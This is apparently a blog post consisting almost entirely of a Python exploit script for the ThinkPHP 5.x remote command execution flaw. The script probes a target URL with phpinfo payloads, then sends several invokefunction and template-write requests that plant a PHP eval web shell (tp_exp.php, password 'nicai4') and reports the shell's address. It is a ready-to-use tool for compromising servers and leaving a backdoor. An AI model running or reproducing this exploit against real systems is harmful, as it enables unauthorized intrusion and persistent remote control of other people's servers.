Exploit:

# /usr/bin/env python3
# -*- coding: utf-8 -*-
# @Author: Morker
# @Email:  [email protected]
# @Blog:   https://96.mk/

import requests
import sys

def demo():
    print('  _______ _     _       _    _____  _    _ _____  ')
    print(' |__   __| |   (_)     | |  |  __ \| |  | |  __ \ ')
    print('    | |  | |__  _ _ __ | | _| |__) | |__| | |__) |')
    print('''    | |  | '_ \| | '_ \| |/ /  ___/|  __  |  ___/ ''')
    print('    | |  | | | | | | | |   <| |    | |  | | |     ')
    print('    |_|  |_| |_|_|_| |_|_|\_\_|    |_|  |_|_|     ')
    print()
    print('\tThinkPHP 5.x (v5.0.23 and v5.1.31 following version).')
    print('\tRemote command execution exploit.')
    print('\tVulnerability verification and getshell.')
    print('\tTarget: http://target/public')
    print()
class ThinkPHP():
    def __init__(self,web):
        self.web = web
        self.headers = {
        "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0",
        "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language" : "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding" : "gzip, deflate",
        "Content-Type" : "application/x-www-form-urlencoded",
        "Connection" : "keep-alive"
        }

    def verification(self):
        i = 0
        s = 0
        verifications = ['/?s=index/\\think\Request/input&filter=phpinfo&data=1','/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1','/?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1']
        while True:
            if i == len(verifications):
                break
            else:
                url = self.web + verifications[i]
                req = requests.get(url=url,headers=self.headers)
                if 'phpinfo()' in req.text:
                    s = 1
                    break
                else:
                    s = 0
                i += 1
        if s == 1:
            print("[+] There are vulnerabilities.")
            print()
            toshell = input("[*] Getshell? (y/n):")
            if toshell == 'y':
                self.getshell()
            elif toshell == 'n':
                sys.exit()
            else:
                sys.exit()
        else:
            print("[-] There are no vulnerabilities.")

    def getshell(self):
        getshells = [
        '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=tp_exp.php&vars[1][]=<?php @eval($_POST[nicai4]); ?>',
        '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20@eval($_POST[nicai4]);%20?>%27%20>>%20tp_exp.php',
        '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20@eval($_POST[nicai4]);%20?^>%20>>tp_exp.php',
        '?s=index/\\think\\template\driver\\file/write&cacheFile=tp_exp.php&content=<?php%20eval($_POST[nicai4]);?>']
        shell = self.web + '/tp_exp.php'
        i = 0
        s = 0
        while True:
            if i == len(getshells):
                break
            else:
                url = self.web + getshells[i]
                req = requests.get(url=url,headers=self.headers)
                req_shell = requests.get(url=shell,headers=self.headers)
                if req_shell.status_code == 200:
                    s = 1
                    break
                else:
                    s = 0
                i += 1
        if s == 1:
            print("[+] WebShell :%s  PassWord :nicai4" % shell)
        else:
            print("[-] The vulnerability does not exist or exists waf.")

def main():
    demo()
    url = input("[*] Please input your target: ")
    run = ThinkPHP(url)
    run.verification()

if __name__ == '__main__':
    main()
最后修改:2020 年 12 月 05 日 12 : 22 PM
© 允许规范转载